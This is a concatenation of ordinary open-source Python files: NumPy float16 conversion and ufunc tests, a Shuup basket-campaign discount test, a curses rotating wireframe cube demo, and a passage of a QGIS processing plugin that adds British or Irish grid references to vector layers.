    self.finite_f64 = self.nonan_f64[1:-1]
def test_half_conversions(self):
    """Checks that all 16-bit values survive conversion
    to/from 32-bit and 64-bit float"""
    # Because the underlying routines preserve the NaN bits, every
    # value is preserved when converting to/from other floats.
    # Convert from float32 back to float16
    b = np.array(self.all_f32, dtype=float16)
    assert_equal(self.all_f16.view(dtype=uint16),
                 b.view(dtype=uint16))
    # Convert from float64 back to float16
    b = np.array(self.all_f64, dtype=float16)
    assert_equal(self.all_f16.view(dtype=uint16),
                 b.view(dtype=uint16))
    # Convert float16 to longdouble and back
    # This doesn't necessarily preserve the extra NaN bits,
    # so exclude NaNs.
    a_ld = np.array(self.nonan_f16, dtype=np.longdouble)
    b = np.array(a_ld, dtype=float16)
    assert_equal(self.nonan_f16.view(dtype=uint16),
                 b.view(dtype=uint16))
    # Check the range for which all integers can be represented
    # (|i| <= 2**11, the size of float16's significand incl. implicit bit).
    i_int = np.arange(-2048, 2049)
    i_f16 = np.array(i_int, dtype=float16)
    j = np.array(i_f16, dtype=int)
    assert_equal(i_int, j)
def test_nans_infs(self):
    """Check NaN/Inf classification ufuncs and that every comparison
    against NaN is False (and != is True)."""
    with np.errstate(all='ignore'):
        # Check some of the ufuncs
        assert_equal(np.isnan(self.all_f16), np.isnan(self.all_f32))
        assert_equal(np.isinf(self.all_f16), np.isinf(self.all_f32))
        assert_equal(np.isfinite(self.all_f16), np.isfinite(self.all_f32))
        assert_equal(np.signbit(self.all_f16), np.signbit(self.all_f32))
        # Spacing past the largest finite value is infinite.
        assert_equal(np.spacing(float16(65504)), np.inf)

        # Check comparisons of all values with NaN
        nan = float16(np.nan)

        assert_(not (self.all_f16 == nan).any())
        assert_(not (nan == self.all_f16).any())

        assert_(not (self.all_f16 < nan).any())
        assert_(not (nan < self.all_f16).any())

        assert_(not (self.all_f16 <= nan).any())
        assert_(not (nan <= self.all_f16).any())

        assert_(not (self.all_f16 > nan).any())
        assert_(not (nan > self.all_f16).any())

        assert_(not (self.all_f16 >= nan).any())
        assert_(not (nan >= self.all_f16).any())

        assert_((self.all_f16 != nan).all())
        assert_((nan != self.all_f16).all())
def test_half_values(self):
    """Confirms a small number of known half values"""
    a = np.array([1.0, -1.0,
                  2.0, -2.0,
                  0.0999755859375, 0.333251953125,  # 1/10, 1/3
                  65504, -65504,            # Maximum magnitude
                  2.0**(-14), -2.0**(-14),  # Minimum normal
                  2.0**(-24), -2.0**(-24),  # Minimum subnormal
                  0, -1/1e1000,             # Signed zeros
                  np.inf, -np.inf])
    # Expected bit patterns for the values above, in the same order.
    b = np.array([0x3c00, 0xbc00,
                  0x4000, 0xc000,
                  0x2e66, 0x3555,
                  0x7bff, 0xfbff,
                  0x0400, 0x8400,
                  0x0001, 0x8001,
                  0x0000, 0x8000,
                  0x7c00, 0xfc00], dtype=uint16)
    # Reinterpret the bit patterns as float16 without conversion.
    b.dtype = float16
    assert_equal(a, b)
def test_half_rounding(self):
    """Checks that rounding when converting to half is correct"""
    a = np.array([2.0**-25 + 2.0**-35,  # Rounds to minimum subnormal
                  2.0**-25,       # Underflows to zero (nearest even mode)
                  2.0**-26,       # Underflows to zero
                  1.0+2.0**-11 + 2.0**-16,  # rounds to 1.0+2**(-10)
                  1.0+2.0**-11,   # rounds to 1.0 (nearest even mode)
                  1.0+2.0**-12,   # rounds to 1.0
                  65519,          # rounds to 65504
                  65520],         # rounds to inf
                 dtype=float64)
    # Expected float16 results, element-for-element.
    rounded = [2.0**-24,
               0.0,
               0.0,
               1.0+2.0**(-10),
               1.0,
               1.0,
               65504,
               np.inf]

    # Check float64->float16 rounding
    b = np.array(a, dtype=float16)
    assert_equal(b, rounded)

    # Check float32->float16 rounding
    a = np.array(a, dtype=float32)
    b = np.array(a, dtype=float16)
    assert_equal(b, rounded)
def test_half_correctness(self):
    """Take every finite float16, and check the casting functions with
    a manual conversion."""

    # Create an array of all finite float16s
    a_bits = self.finite_f16.view(dtype=uint16)

    # Convert to 64-bit float manually: sign bit, 5-bit biased exponent,
    # 10-bit mantissa.
    a_sgn = (-1.0)**((a_bits & 0x8000) >> 15)
    a_exp = np.array((a_bits & 0x7c00) >> 10, dtype=np.int32) - 15
    a_man = (a_bits & 0x03ff) * 2.0**(-10)
    # Implicit bit of normalized floats
    a_man[a_exp != -15] += 1
    # Denormalized exponent is -14
    a_exp[a_exp == -15] = -14

    a_manual = a_sgn * a_man * 2.0**a_exp

    a32_fail = np.nonzero(self.finite_f32 != a_manual)[0]
    if len(a32_fail) != 0:
        bad_index = a32_fail[0]
        assert_equal(self.finite_f32, a_manual,
                     "First non-equal is half value %x -> %g != %g" %
                     (self.finite_f16[bad_index],
                      self.finite_f32[bad_index],
                      a_manual[bad_index]))

    a64_fail = np.nonzero(self.finite_f64 != a_manual)[0]
    if len(a64_fail) != 0:
        bad_index = a64_fail[0]
        assert_equal(self.finite_f64, a_manual,
                     "First non-equal is half value %x -> %g != %g" %
                     (self.finite_f16[bad_index],
                      self.finite_f64[bad_index],
                      a_manual[bad_index]))
def test_half_ordering(self):
    """Make sure comparisons are working right"""

    # All non-NaN float16 values in reverse order
    a = self.nonan_f16[::-1].copy()

    # 32-bit float copy
    b = np.array(a, dtype=float32)

    # Should sort the same
    a.sort()
    b.sort()
    assert_equal(a, b)

    # Comparisons should work
    assert_((a[:-1] <= a[1:]).all())
    assert_(not (a[:-1] > a[1:]).any())
    assert_((a[1:] >= a[:-1]).all())
    assert_(not (a[1:] < a[:-1]).any())
    # All != except for +/-0 (which compare equal), hence size-2.
    assert_equal(np.nonzero(a[:-1] < a[1:])[0].size, a.size-2)
    assert_equal(np.nonzero(a[1:] > a[:-1])[0].size, a.size-2)
def test_half_funcs(self):
    """Test the various ArrFuncs"""
    # fill
    assert_equal(np.arange(10, dtype=float16),
                 np.arange(10, dtype=float32))

    # fillwithscalar
    a = np.zeros((5,), dtype=float16)
    a.fill(1)
    assert_equal(a, np.ones((5,), dtype=float16))

    # nonzero and copyswap
    # (-1/1e20 underflows to -0 in float16, so index 3 is not counted)
    a = np.array([0, 0, -1, -1/1e20, 0, 2.0**-24, 7.629e-6], dtype=float16)
    assert_equal(a.nonzero()[0],
                 [2, 5, 6])
    a = a.byteswap().newbyteorder()
    assert_equal(a.nonzero()[0],
                 [2, 5, 6])

    # dot
    a = np.arange(0, 10, 0.5, dtype=float16)
    b = np.ones((20,), dtype=float16)
    assert_equal(np.dot(a, b),
                 95)

    # argmax
    a = np.array([0, -np.inf, -2, 0.5, 12.55, 7.3, 2.1, 12.4], dtype=float16)
    assert_equal(a.argmax(),
                 4)
    # argmax propagates NaN: index 5 holds np.nan.
    a = np.array([0, -np.inf, -2, np.inf, 12.55, np.nan, 2.1, 12.4], dtype=float16)
    assert_equal(a.argmax(),
                 5)

    # getitem
    a = np.arange(10, dtype=float16)
    for i in range(10):
        assert_equal(a.item(i), i)
def test_spacing_nextafter(self):
    """Test np.spacing and np.nextafter"""
    # All non-negative finite #'s
    a = np.arange(0x7c00, dtype=uint16)
    hinf = np.array((np.inf,), dtype=float16)
    # a_f16 is a view of a's buffer, so mutating a below changes a_f16 too.
    a_f16 = a.view(dtype=float16)

    assert_equal(np.spacing(a_f16[:-1]), a_f16[1:]-a_f16[:-1])

    assert_equal(np.nextafter(a_f16[:-1], hinf), a_f16[1:])
    assert_equal(np.nextafter(a_f16[0], -hinf), -a_f16[1])
    assert_equal(np.nextafter(a_f16[1:], -hinf), a_f16[:-1])

    # switch to negatives (set the sign bit of every element in place)
    a |= 0x8000

    assert_equal(np.spacing(a_f16[0]), np.spacing(a_f16[1]))
    assert_equal(np.spacing(a_f16[1:]), a_f16[:-1]-a_f16[1:])

    assert_equal(np.nextafter(a_f16[0], hinf), -a_f16[1])
    assert_equal(np.nextafter(a_f16[1:], hinf), a_f16[:-1])
    assert_equal(np.nextafter(a_f16[:-1], -hinf), a_f16[1:])
def test_half_ufuncs(self):
    """Test the various ufuncs"""

    # All operands chosen so results are exactly representable in float16.
    a = np.array([0, 1, 2, 4, 2], dtype=float16)
    b = np.array([-2, 5, 1, 4, 3], dtype=float16)
    c = np.array([0, -1, -np.inf, np.nan, 6], dtype=float16)

    # Arithmetic
    assert_equal(np.add(a, b), [-2, 6, 3, 8, 5])
    assert_equal(np.subtract(a, b), [2, -4, 1, 0, -1])
    assert_equal(np.multiply(a, b), [0, 5, 2, 16, 6])
    assert_equal(np.divide(a, b), [0, 0.199951171875, 2, 1, 0.66650390625])

    # Comparisons and logic
    assert_equal(np.equal(a, b), [False, False, False, True, False])
    assert_equal(np.not_equal(a, b), [True, True, True, False, True])
    assert_equal(np.less(a, b), [False, True, False, False, True])
    assert_equal(np.less_equal(a, b), [False, True, False, True, True])
    assert_equal(np.greater(a, b), [True, False, True, False, False])
    assert_equal(np.greater_equal(a, b), [True, False, True, True, False])
    assert_equal(np.logical_and(a, b), [False, True, True, True, True])
    assert_equal(np.logical_or(a, b), [True, True, True, True, True])
    assert_equal(np.logical_xor(a, b), [True, False, False, False, False])
    assert_equal(np.logical_not(a), [True, False, False, False, False])

    # Classification and sign handling
    assert_equal(np.isnan(c), [False, False, False, True, False])
    assert_equal(np.isinf(c), [False, False, True, False, False])
    assert_equal(np.isfinite(c), [True, True, False, False, True])
    assert_equal(np.signbit(b), [True, False, False, False, False])

    assert_equal(np.copysign(b, a), [2, 5, 1, 4, 3])

    # maximum/minimum propagate NaN; fmax/fmin ignore it.
    assert_equal(np.maximum(a, b), [0, 5, 2, 4, 3])
    x = np.maximum(b, c)
    assert_(np.isnan(x[3]))
    x[3] = 0
    assert_equal(x, [0, 5, 1, 0, 6])
    assert_equal(np.minimum(a, b), [-2, 1, 1, 4, 2])
    x = np.minimum(b, c)
    assert_(np.isnan(x[3]))
    x[3] = 0
    assert_equal(x, [-2, -1, -np.inf, 0, 3])
    assert_equal(np.fmax(a, b), [0, 5, 2, 4, 3])
    assert_equal(np.fmax(b, c), [0, 5, 1, 4, 6])
    assert_equal(np.fmin(a, b), [-2, 1, 1, 4, 2])
    assert_equal(np.fmin(b, c), [-2, -1, -np.inf, 4, 3])

    # Division-related and unary ufuncs
    assert_equal(np.floor_divide(a, b), [0, 0, 2, 1, 0])
    assert_equal(np.remainder(a, b), [0, 1, 0, 0, 2])
    assert_equal(np.divmod(a, b), ([0, 0, 2, 1, 0], [0, 1, 0, 0, 2]))
    assert_equal(np.square(b), [4, 25, 1, 16, 9])
    assert_equal(np.reciprocal(b), [-0.5, 0.199951171875, 1, 0.25, 0.333251953125])
    assert_equal(np.ones_like(b), [1, 1, 1, 1, 1])
    assert_equal(np.conjugate(b), b)
    assert_equal(np.absolute(b), [2, 5, 1, 4, 3])
    assert_equal(np.negative(b), [2, -5, -1, -4, -3])
    assert_equal(np.positive(b), b)
    assert_equal(np.sign(b), [-1, 1, 1, 1, 1])
    assert_equal(np.modf(b), ([0, 0, 0, 0, 0], b))
    assert_equal(np.frexp(b), ([-0.5, 0.625, 0.5, 0.5, 0.75], [2, 3, 1, 3, 2]))
    assert_equal(np.ldexp(b, [0, 1, 2, 4, 2]), [-2, 10, 4, 64, 12])
def test_half_coercion(self):
    """Test that half gets coerced properly with the other types"""
    # a* are 1-element arrays, b* are scalars; the assertions below pin
    # the array-vs-scalar promotion rules for float16 power operands.
    a16 = np.array((1,), dtype=float16)
    a32 = np.array((1,), dtype=float32)
    b16 = float16(1)
    b32 = float32(1)

    # Python ints/floats and scalars do not upcast a float16 array...
    assert_equal(np.power(a16, 2).dtype, float16)
    assert_equal(np.power(a16, 2.0).dtype, float16)
    assert_equal(np.power(a16, b16).dtype, float16)
    assert_equal(np.power(a16, b32).dtype, float16)
    assert_equal(np.power(a16, a16).dtype, float16)
    # ...but a float32 array does.
    assert_equal(np.power(a16, a32).dtype, float32)

    # float16 scalar with Python numbers promotes to float64.
    assert_equal(np.power(b16, 2).dtype, float64)
    assert_equal(np.power(b16, 2.0).dtype, float64)
    assert_equal(np.power(b16, b16).dtype, float16)
    assert_equal(np.power(b16, b32).dtype, float32)
    assert_equal(np.power(b16, a16).dtype, float16)
    assert_equal(np.power(b16, a32).dtype, float32)

    assert_equal(np.power(a32, a16).dtype, float32)
    assert_equal(np.power(a32, b16).dtype, float32)
    assert_equal(np.power(b32, a16).dtype, float16)
    assert_equal(np.power(b32, b16).dtype, float32)
@dec.skipif(platform.machine() == "armv5tel", "See gh-413.")
def test_half_fpe(self):
    """Check that float16 arithmetic raises the expected floating-point
    errors (underflow/overflow/invalid) when errstate is set to raise.

    Magic numbers used below (IEEE binary16): 2**-24 is the smallest
    subnormal, 2**-14 the smallest normal, and 65504 the largest finite
    value.
    """
    with np.errstate(all='raise'):
        sx16 = np.array((1e-4,), dtype=float16)   # small value (array)
        bx16 = np.array((1e4,), dtype=float16)    # big value (array)
        sy16 = float16(1e-4)                      # small value (scalar)
        by16 = float16(1e4)                       # big value (scalar)

        # Underflow errors — exercised for every array/scalar combination.
        assert_raises_fpe('underflow', lambda a, b:a*b, sx16, sx16)
        assert_raises_fpe('underflow', lambda a, b:a*b, sx16, sy16)
        assert_raises_fpe('underflow', lambda a, b:a*b, sy16, sx16)
        assert_raises_fpe('underflow', lambda a, b:a*b, sy16, sy16)
        assert_raises_fpe('underflow', lambda a, b:a/b, sx16, bx16)
        assert_raises_fpe('underflow', lambda a, b:a/b, sx16, by16)
        assert_raises_fpe('underflow', lambda a, b:a/b, sy16, bx16)
        assert_raises_fpe('underflow', lambda a, b:a/b, sy16, by16)
        # Dividing the smallest normal by 2**11 lands below the subnormal
        # range; these must signal underflow.
        assert_raises_fpe('underflow', lambda a, b:a/b,
                          float16(2.**-14), float16(2**11))
        assert_raises_fpe('underflow', lambda a, b:a/b,
                          float16(-2.**-14), float16(2**11))
        assert_raises_fpe('underflow', lambda a, b:a/b,
                          float16(2.**-14+2**-24), float16(2))
        assert_raises_fpe('underflow', lambda a, b:a/b,
                          float16(-2.**-14-2**-24), float16(2))
        assert_raises_fpe('underflow', lambda a, b:a/b,
                          float16(2.**-14+2**-23), float16(4))

        # Overflow errors
        assert_raises_fpe('overflow', lambda a, b:a*b, bx16, bx16)
        assert_raises_fpe('overflow', lambda a, b:a*b, bx16, by16)
        assert_raises_fpe('overflow', lambda a, b:a*b, by16, bx16)
        assert_raises_fpe('overflow', lambda a, b:a*b, by16, by16)
        assert_raises_fpe('overflow', lambda a, b:a/b, bx16, sx16)
        assert_raises_fpe('overflow', lambda a, b:a/b, bx16, sy16)
        assert_raises_fpe('overflow', lambda a, b:a/b, by16, sx16)
        assert_raises_fpe('overflow', lambda a, b:a/b, by16, sy16)
        # 65504 + 17 rounds past the largest finite half.
        assert_raises_fpe('overflow', lambda a, b:a+b,
                          float16(65504), float16(17))
        assert_raises_fpe('overflow', lambda a, b:a-b,
                          float16(-65504), float16(17))
        assert_raises_fpe('overflow', np.nextafter, float16(65504), float16(np.inf))
        assert_raises_fpe('overflow', np.nextafter, float16(-65504), float16(-np.inf))
        assert_raises_fpe('overflow', np.spacing, float16(65504))

        # Invalid value errors
        assert_raises_fpe('invalid', np.divide, float16(np.inf), float16(np.inf))
        assert_raises_fpe('invalid', np.spacing, float16(np.inf))
        assert_raises_fpe('invalid', np.spacing, float16(np.nan))
        assert_raises_fpe('invalid', np.nextafter, float16(np.inf), float16(0))
        assert_raises_fpe('invalid', np.nextafter, float16(-np.inf), float16(0))
        assert_raises_fpe('invalid', np.nextafter, float16(0), float16(np.nan))

        # These should not raise
        float16(65472)+float16(32)
        float16(2**-13)/float16(2)
        float16(2**-14)/float16(2**10)
        np.spacing(float16(-65504))
        np.nextafter(float16(65504), float16(-np.inf))
        np.nextafter(float16(-65504), float16(np.inf))
        float16(2**-14)/float16(2**10)
        float16(-2**-14)/float16(2**10)
        float16(2**-14+2**-23)/float16(2)
        float16(-2**-14-2**-23)/float16(2)
def test_half_array_interface(self):
"""Test that half is compatible with __array_interface__"""
class Dummy:
pass
a = np.ones((1,), dtype=float16)
b = Dummy()
b.__array_interface__ = a.__array_interface__
c = np.array(b)
assert_(c.dtype == float16)
assert_equal(a, c)
if __name__ == "__main__":
    # Allow running this test module directly via the legacy numpy runner.
    run_module_suite()
| Ziqi-Li/bknqgis | numpy/numpy/core/tests/test_half.py | Python | gpl-2.0 | 18,627 |
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import pytest
from decimal import Decimal
from django.test import override_settings
from django.test.client import RequestFactory
from shuup.campaigns.models import BasketCampaign, BasketLineEffect, CatalogCampaign
from shuup.campaigns.models.basket_conditions import CategoryProductsBasketCondition, ComparisonOperator
from shuup.campaigns.models.basket_line_effects import DiscountFromCategoryProducts, DiscountFromProduct
from shuup.campaigns.models.catalog_filters import ProductFilter
from shuup.campaigns.models.product_effects import ProductDiscountPercentage
from shuup.front.basket import get_basket
from shuup.testing.factories import create_product, get_default_category, get_default_supplier, get_shipping_method
from shuup_tests.campaigns import initialize_test
from shuup_tests.utils import printable_gibberish
@pytest.mark.django_db
@override_settings(SHUUP_DISCOUNT_MODULES=["customer_group_discount", "catalog_campaigns"])
def test_multiple_campaigns_cheapest_price():
    """When a catalog campaign (30 % off) and a basket campaign overlap,
    the larger discount must win: first the percentage discount applies
    (basket discount of 10 is smaller), then, after bumping the basket
    discount to 50, the basket discount applies instead.
    """
    rf = RequestFactory()
    request, shop, group = initialize_test(rf, False)
    price = shop.create_price

    product_price = "100"
    discount_percentage = "0.30"
    discount_amount_value = "10"
    total_discount_amount = "50"
    # Price after the 30 % catalog discount.
    expected_total = price(product_price) - (Decimal(discount_percentage) * price(product_price))
    # Price after the (larger) 50-unit basket discount.
    matching_expected_total = price(product_price) - price(total_discount_amount)

    category = get_default_category()
    supplier = get_default_supplier(shop)
    product = create_product(printable_gibberish(), shop=shop, supplier=supplier, default_price=product_price)
    shop_product = product.get_shop_instance(shop)
    shop_product.categories.add(category)

    # create catalog campaign
    catalog_filter = ProductFilter.objects.create()
    catalog_filter.products.add(product)
    catalog_campaign = CatalogCampaign.objects.create(shop=shop, active=True, name="test")
    catalog_campaign.filters.add(catalog_filter)
    cdp = ProductDiscountPercentage.objects.create(campaign=catalog_campaign, discount_percentage=discount_percentage)

    # create basket campaign
    condition = CategoryProductsBasketCondition.objects.create(operator=ComparisonOperator.EQUALS, quantity=1)
    condition.categories.add(category)
    basket_campaign = BasketCampaign.objects.create(shop=shop, public_name="test", name="test", active=True)
    basket_campaign.conditions.add(condition)
    effect = DiscountFromProduct.objects.create(campaign=basket_campaign, discount_amount=discount_amount_value)
    effect.products.add(product)

    # add product to basket
    basket = get_basket(request)
    basket.add_product(supplier=supplier, shop=shop, product=product, quantity=1)
    basket.shipping_method = get_shipping_method(shop=shop)
    final_lines = basket.get_final_lines()
    # Product line + shipping line.
    assert len(final_lines) == 2
    assert basket.total_price == expected_total

    effect.discount_amount = total_discount_amount
    effect.save()
    basket.uncache()
    catalog_campaign.save()  # save to bump caches
    basket_campaign.save()  # save to bump caches
    assert basket.total_price == matching_expected_total  # discount is now bigger than the original

    effect.delete()  # remove effect
    basket.uncache()
    catalog_campaign.save()  # save to bump caches
    basket_campaign.save()  # save to bump caches
    assert BasketLineEffect.objects.count() == 0
    # With the basket effect gone, the catalog discount applies again.
    assert basket.total_price == expected_total

    # add new effect
    effect = DiscountFromCategoryProducts.objects.create(
        category=category, campaign=basket_campaign, discount_amount=discount_amount_value
    )
    assert basket.total_price == expected_total
    effect.discount_amount = total_discount_amount
    effect.save()
    basket.uncache()
    catalog_campaign.save()  # save to bump caches
    basket_campaign.save()  # save to bump caches
    assert basket.total_price == matching_expected_total  # discount is now bigger than the original
| shoopio/shoop | shuup_tests/campaigns/test_multiple_campaigns.py | Python | agpl-3.0 | 4,185 |
import sys
import os
# Make the termux2d package importable when running from the examples dir.
sys.path.append(os.path.abspath(".."))
from termux2d import Canvas, line
import curses
import math
from time import sleep
import locale
# Use the user's locale so curses can emit multi-byte drawing characters.
locale.setlocale(locale.LC_ALL,"")
stdscr = curses.initscr()
stdscr.refresh()
class Point3D:
    """A point in 3-D space that supports rotation about each axis and a
    simple perspective projection onto a 2-D plane."""

    def __init__(self, x = 0, y = 0, z = 0):
        # Coordinates are always stored as floats.
        self.x, self.y, self.z = float(x), float(y), float(z)

    def rotateX(self, angle):
        """ Rotates the point around the X axis by the given angle in degrees. """
        rad = angle * math.pi / 180
        cosa, sina = math.cos(rad), math.sin(rad)
        return Point3D(self.x,
                       self.y * cosa - self.z * sina,
                       self.y * sina + self.z * cosa)

    def rotateY(self, angle):
        """ Rotates the point around the Y axis by the given angle in degrees. """
        rad = angle * math.pi / 180
        cosa, sina = math.cos(rad), math.sin(rad)
        return Point3D(self.z * sina + self.x * cosa,
                       self.y,
                       self.z * cosa - self.x * sina)

    def rotateZ(self, angle):
        """ Rotates the point around the Z axis by the given angle in degrees. """
        rad = angle * math.pi / 180
        cosa, sina = math.cos(rad), math.sin(rad)
        return Point3D(self.x * cosa - self.y * sina,
                       self.x * sina + self.y * cosa,
                       self.z)

    def project(self, win_width, win_height, fov, viewer_distance):
        """ Transforms this 3D point to 2D using a perspective projection. """
        factor = fov / (viewer_distance + self.z)
        return Point3D(self.x * factor + win_width / 2,
                       -self.y * factor + win_height / 2,
                       1)
# The eight corners of a cube centred on the origin, side length 40.
vertices = [
    Point3D(-20,20,-20),
    Point3D(20,20,-20),
    Point3D(20,-20,-20),
    Point3D(-20,-20,-20),
    Point3D(-20,20,20),
    Point3D(20,20,20),
    Point3D(20,-20,20),
    Point3D(-20,-20,20)
]

# Define the vertices that compose each of the 6 faces. These numbers are
# indices to the vertices list defined above.
faces = [(0,1,2,3),(1,5,6,2),(5,4,7,6),(4,0,3,7),(0,4,5,1),(3,2,6,7)]
def __main__(stdscr, projection=False):
    """Render a spinning wireframe cube into the curses window *stdscr*.

    When *projection* is True each vertex is perspective-projected from
    3D to 2D before drawing; otherwise the raw x/y coordinates are used.
    Runs until interrupted (e.g. Ctrl-C via curses.wrapper).
    """
    angleX, angleY, angleZ = 0, 0, 0
    c = Canvas()
    while True:
        # Will hold transformed vertices.
        transformed = []
        for v in vertices:
            # Rotate the point around X axis, then around Y axis, and finally around Z axis.
            p = v.rotateX(angleX).rotateY(angleY).rotateZ(angleZ)
            if projection:
                # Transform the point from 3D to 2D
                p = p.project(50, 50, 50, 50)
            # Put the point in the list of transformed vertices
            transformed.append(p)
        # Draw the four edges of every face: pair each corner with the
        # next one, wrapping around (0-1, 1-2, 2-3, 3-0).  This replaces
        # four copy-pasted line-drawing stanzas in the original.
        for face in faces:
            corners = [transformed[i] for i in face]
            for start, end in zip(corners, corners[1:] + corners[:1]):
                for x, y in line(start.x, start.y, end.x, end.y):
                    c.set(x, y)
        # Use a distinct name for the rendered frame; the original reused
        # the face loop variable `f` here, shadowing it confusingly.
        frame_text = c.frame(-40, -40, 80, 80)
        stdscr.addstr(0, 0, '{0}\n'.format(frame_text))
        stdscr.refresh()
        angleX += 2
        angleY += 3
        angleZ += 5
        sleep(1.0/20)
        c.clear()
if __name__ == '__main__':
    from sys import argv
    # Pass -p on the command line to enable perspective projection.
    projection = False
    if '-p' in argv:
        projection = True
    # curses.wrapper restores the terminal state on exit or error.
    curses.wrapper(__main__, projection)
| ericmux/termux2d | examples/rotating_cube.py | Python | mit | 3,438 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
AddGridRef
A QGIS plugin
Adds British or Irish grid references to layers
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2019-01-30
copyright : (C) 2019 by Field Studies Council
email : r.burkmar@field-studies-council.org
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
__author__ = 'Field Studies Council'
__date__ = '2019-01-30'
__copyright__ = '(C) 2019 by Field Studies Council'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt5.QtCore import (QCoreApplication, QVariant)
from qgis.core import (QgsProcessing,
QgsMessageLog,
QgsFeatureSink,
QgsFeature,
QgsProcessingAlgorithm,
QgsField,
QgsCoordinateReferenceSystem,
QgsCoordinateTransform,
QgsProject,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingParameterFeatureSink,
Qgis)
from . import osgr
class AddGridRefAlgorithm(QgsProcessingAlgorithm):
    """
    QGIS Processing algorithm that copies an input vector layer and adds
    columns with British or Irish National Grid references (and/or
    easting/northing or WGS84 lat/lng) derived from each feature's
    centroid.
    """

    # Constants used to refer to parameters and outputs. They will be
    # used when calling the algorithm from another algorithm, or when
    # calling from the QGIS console.

    OUTPUT = 'OUTPUT'
    INPUT = 'INPUT'
    # NOTE(review): the value 'GRYPE' looks like a typo for 'GRTYPE', but it
    # is used consistently as the parameter name; changing it would break
    # saved models/scripts that reference the parameter — leave as is.
    GRTYPE = 'GRYPE'
    PRECISIONS = 'PRECISIONS'
    PREFIX = 'PREFIX'

    # Supported grids with their CRS (OSGB 1936 / Irish Grid).
    dGrType = [
        {"name": "British National Grid", "code": "os", "crs": QgsCoordinateReferenceSystem("EPSG:27700")},
        {"name": "Irish National Grid", "code": "irish", "crs": QgsCoordinateReferenceSystem("EPSG:29903")}
    ]
    aGrTypeName = list(map((lambda x: x["name"]), dGrType))

    # "num" > 0 is a grid-reference precision in metres; -1 means raw
    # easting/northing columns; -2 means WGS84 lat/lng columns.  "field"
    # is the output column name (two space-separated names for the
    # coordinate-pair cases).
    dPrecisions = [
        {"text": "10 figure GR (1 m)", "num": 1, "field": "10figGR"},
        {"text": "8 figure GR (10 m)", "num": 10, "field": "8figGR"},
        {"text": "6 figure GR (100 m)", "num": 100, "field": "6figGR"},
        {"text": "Monad (1 km)", "num": 1000, "field": "monad"},
        {"text": "Tetrad (2 km)", "num": 2000, "field": "tetrad"},
        {"text": "Quadrant (5 km)", "num": 5000, "field": "quadrant"},
        {"text": "Hectad (10 km)", "num": 10000, "field": "hectad"},
        {"text": "100 km", "num": 100000, "field": "100km"},
        {"text": "Easting/northings", "num": -1, "field": "Easting Northing"},
        {"text": "Lat/lng (WGS84)", "num": -2, "field": "Lat Lng"}
    ]
    aPrecisionText = list(map((lambda x: x["text"]), dPrecisions))

    # Get a reference to an osgr object
    # (class attribute shadows the imported `osgr` module inside the class body)
    osgr = osgr.osgr()

    def logMessage(self, message):
        # Convenience wrapper writing to the QGIS message log panel.
        QgsMessageLog.logMessage(message, "Add Grid Ref Algorithm")

    def initAlgorithm(self, config):
        """
        Here we define the inputs and output of the algorithm, along
        with some other properties.
        """
        # We add the input vector features source. It can have any kind of
        # geometry.
        self.addParameter(
            QgsProcessingParameterFeatureSource(
                self.INPUT,
                self.tr('Input layer'),
                [QgsProcessing.TypeVectorAnyGeometry]
            )
        )
        # Parameter for selecting British or Irish Grid
        self.addParameter(
            QgsProcessingParameterEnum(
                self.GRTYPE,
                self.tr('Select British or Irish National Grid'),
                self.aGrTypeName,
                False # Single select
            )
        )
        # Parameter for selecting grid reference precisions
        # Note that the multi-select does not work in the Modeller - https://issues.qgis.org/issues/20406
        self.addParameter(
            QgsProcessingParameterEnum(
                self.PRECISIONS,
                self.tr('Select the type of Grid References to add'),
                self.aPrecisionText,
                True # Multi select
            )
        )
        # Parameter for prefixing field name
        self.addParameter(
            QgsProcessingParameterString(
                self.PREFIX,
                self.tr('Optionally, indicate a short prefix for output column names'),
                None, # No default value
                False, # Not multi-line
                True # Optional
            )
        )
        # We add a feature sink in which to store our processed features (this
        # usually takes the form of a newly created vector layer when the
        # algorithm is run in QGIS).
        self.addParameter(
            QgsProcessingParameterFeatureSink(
                self.OUTPUT,
                self.tr('Output layer')
            )
        )

    def processAlgorithm(self, parameters, context, feedback):
        """
        Here is where the processing itself takes place.
        """
        feedback.pushInfo("Starting processing algo")

        # Retrieve the feature source.
        source = self.parameterAsSource(parameters, self.INPUT, context)
        fields = source.fields()

        # Get the field prefix (spaces are stripped so it stays a valid
        # field-name fragment).
        prefix = self.parameterAsString (parameters, self.PREFIX, context)
        prefix = prefix.replace(" ", "")

        # Get the precision choices and make the appropriate output fields
        precisions = self.parameterAsEnums (parameters, self.PRECISIONS, context)
        for p in precisions:
            if self.dPrecisions[p]["num"] > 0:
                fieldName = prefix + self.dPrecisions[p]["field"]
                fields.append(QgsField(fieldName, QVariant.String))
            elif self.dPrecisions[p]["num"] < 0: #Easting/northing (-1) or Lat/lng (-2)
                if self.dPrecisions[p]["num"] == -1:
                    dataType = QVariant.Int
                else:
                    dataType = QVariant.Double
                # Coordinate pairs produce two columns, e.g. "Easting" and
                # "Northing".
                fieldName = self.dPrecisions[p]["field"].split(" ")
                fieldNameX = prefix + fieldName[0]
                fields.append( QgsField(fieldNameX, dataType))
                fieldNameY = prefix + fieldName[1]
                fields.append(QgsField(fieldNameY, dataType))

        # Create the feature sink. The 'dest_id' variable is used
        # to uniquely identify the feature sink, and must be included in the
        # dictionary returned by the processAlgorithm function.
        (sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT,
                context, fields, source.wkbType(), source.sourceCrs())

        # Get the other parameters
        grtype = self.parameterAsEnum (parameters, self.GRTYPE, context)

        # Only build a transform if the source CRS differs from the grid CRS.
        transform = None
        if self.dGrType[grtype]["crs"] != source.sourceCrs():
            transform = QgsCoordinateTransform(source.sourceCrs(), self.dGrType[grtype]["crs"], QgsProject.instance())
